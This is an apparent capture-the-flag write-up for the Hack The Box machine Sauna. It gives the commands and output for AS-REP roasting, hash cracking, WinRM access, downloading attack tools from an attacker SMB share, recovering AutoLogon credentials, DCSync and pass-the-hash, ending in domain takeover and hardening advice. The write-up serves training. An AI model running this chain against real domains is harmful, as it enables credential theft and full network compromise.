htb-writeups
Sauna HTB
Executive Summary
This report documents the complete penetration testing process for the Sauna HTB machine, covering reconnaissance, enumeration, exploitation, lateral movement, and privilege escalation leading to full domain compromise.
Target: 10.129.23.17
Domain: EGOTISTICAL-BANK.LOCAL
Difficulty: Medium
Attack Vector: Kerberos AS-REP Roasting → Lateral Movement → DCSync Attack
Reconnaissance
Initial Port Scan
export target=10.129.23.17
sudo nmap -p- --min-rate 1000 -sT -vvv $target
Open Ports Discovered:
53/tcp - DNS
80/tcp - HTTP
88/tcp - Kerberos
135/tcp - RPC
139/tcp - NetBIOS-SSN
389/tcp - LDAP
445/tcp - SMB
593/tcp - RPC over HTTP
636/tcp - LDAPS
3268/tcp - Global Catalog
3269/tcp - Global Catalog SSL
5985/tcp - WinRM
9389/tcp - AD WS
49668/tcp - Unknown
49673/tcp - Unknown
49674/tcp - Unknown
49677/tcp - Unknown
49698/tcp - Unknown
Service Version Detection
sudo nmap -sC -sV -p 53,80,88,135,139,389,445,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49698 -T4 $target
Key Services Identified:
- Domain Controller: Active Directory Environment
- Web Server: Port 80 - Corporate Website
- Kerberos: Port 88 - Authentication Service
- SMB: Port 445 - File Sharing
- WinRM: Port 5985 - Remote Management
Service Enumeration
Web Service Analysis
Visiting http://10.129.23.17 revealed:
- Corporate website for “Egotistical Bank”
- Potential usernames from employee mentions
- Domain:
EGOTISTICAL-BANK.LOCAL
SMB Enumeration
smbclient -N -L //10.129.23.17/
- Anonymous access attempted
- No accessible shares found
RPC Enumeration
LDAP Reconnaissance
ldapsearch -x -H ldap://10.129.23.17 -s base namingcontexts
ldapsearch -x -H ldap://10.129.23.17 -D 'CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL'
- Initial LDAP queries unsuccessful
- Required authenticated access
Domain Enumeration
Username Discovery
From website analysis, compiled potential usernames:
fsmith
hsmith
administrator
Administrator
skerb
btaylor
hbear
sdriver
scoins
Kerbrute User Enumeration
./kerbrute_linux_amd64 userenum --dc 10.129.23.17 -d 'EGOTISTICAL-BANK.LOCAL' ./user.txt -t 100
Valid Users Identified:
- ✅
administrator@EGOTISTICAL-BANK.LOCAL - ✅
fsmith@EGOTISTICAL-BANK.LOCAL - ✅
hsmith@EGOTISTICAL-BANK.LOCAL - ✅
Administrator@EGOTISTICAL-BANK.LOCAL
AS-REP Roasting Attack
for i in $(cat user.txt); do
impacket-GetNPUsers -no-pass -dc-ip 10.129.23.17 EGOTISTICAL-BANK.LOCAL/${i} | grep -v Impacket 2>/dev/null
done
Hash Captured:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:2b1986c97a10ef3204fb226b0e762434$3efb00e3a2e206f8e5db2c866150985e1bd7ddc93af53df430d9a84fb6666eeb4d0ba5d5225f38b7bc4568ca64460b7fa3e25533a8755d5331c6007165b2fed19e1b10573eb67cce743b8403f076c2b17479dfc00c7b583d53b5c0d03f12d7fdccbe7dd8d731bf4a30640359af936ad38566b85f09438f1edfe563e01289ab62dc094f4026731ae197e86bfdf1e4fd3a276f09f99123fcdb5d5e2e35f79e37feb566926d37dea632f8150cd4cd73e5206943fee0ec6db3744ef31c04c966be4ba9d3e0a8a8616c7a976bf8bd12355baca356b47b7134d1e41121b61338809045b79639d4425ebc13e12f7020e10740c0a5aec0c1ae02e300e5f9361ff97ce21e
Password Cracking
hashcat -m 18200 -a 0 hash /usr/share/wordlists/rockyou.txt
Cracked Credentials:
- Username:
fsmith - Password:
Thestrokes23
Initial Compromise
WinRM Access
evil-winrm -i 10.129.23.17 -u fsmith -p 'Thestrokes23'
User Flag Captured:
ed460a49a0244195b79ac008552d0ed5
Internal Reconnaissance
Transferred and executed WinPEAS for privilege escalation analysis:
net use \\10.10.14.90\share /u:ara ara
copy \\10.10.14.90\share\winpeas.exe .
.\winpeas.exe -cmd fast
Critical Finding - AutoLogon Credentials:
DefaultDomainName: EGOTISTICALBANK
DefaultUserName: EGOTISTICALBANK\svc_loanmanager
DefaultPassword: Moneymakestheworldgoround!
Lateral Movement
Service Account Access
evil-winrm -i 10.129.23.17 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
BloodHound Enumeration
Transferred SharpHound collector and extracted domain data:
copy \\10.10.14.90\share\SharpHound.exe .
.\SharpHound.exe
BloodHound Analysis Revealed:
svc_loanmgrhasGetChangesAllpermission- Capable of performing DCSync attack
Privilege Escalation
DCSync Attack
impacket-secretsdump 'svc_loanmgr:Moneymakestheworldgoround!@10.129.23.17'
Administrator Hash Extracted:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Pass-the-Hash Attack
evil-winrm -i 10.129.23.17 -u Administrator -H '823452073d75b9d1cf70ebdf86c7f98e'
Domain Compromise
Root Flag Captured
type C:\Users\Administrator\Desktop\root.txt
114ef3fc9eebaf7b583e12c1ce87c3bc
Full Domain Control Achieved
- ✅ Domain Administrator access
- ✅ Ability to extract all domain credentials
- ✅ Complete control over EGOTISTICAL-BANK.LOCAL domain
Lessons Learned
Security Vulnerabilities Identified
- Weak Password Policy
- Easily crackable user passwords
- No account lockout policy evident
- Kerberos Misconfiguration
- AS-REP Roasting vulnerability
- Pre-authentication not required for some accounts
- Excessive Service Account Permissions
svc_loanmgrhad unnecessary DCSync rights- Poor principle of least privilege implementation
- Credential Exposure
- AutoLogon credentials stored insecurely
- Clear-text credentials recoverable from registry
Recommendations
- Implement Strong Password Policies
- Enforce complex password requirements
- Implement account lockout mechanisms
- Kerberos Hardening
- Require pre-authentication for all accounts
- Monitor for AS-REP Roasting attempts
- Principle of Least Privilege
- Review and restrict service account permissions
- Regular access control audits
- Credential Protection
- Eliminate AutoLogon in enterprise environments
- Implement LAPS for local administrator passwords
Tools Used
- Nmap - Port scanning and service enumeration
- Kerbrute - Username enumeration
- Impacket - AS-REP roasting and DCSync attacks
- Hashcat - Password cracking
- Evil-WinRM - Remote system access
- WinPEAS - Windows privilege escalation enumeration
- BloodHound/SharpHound - Active Directory analysis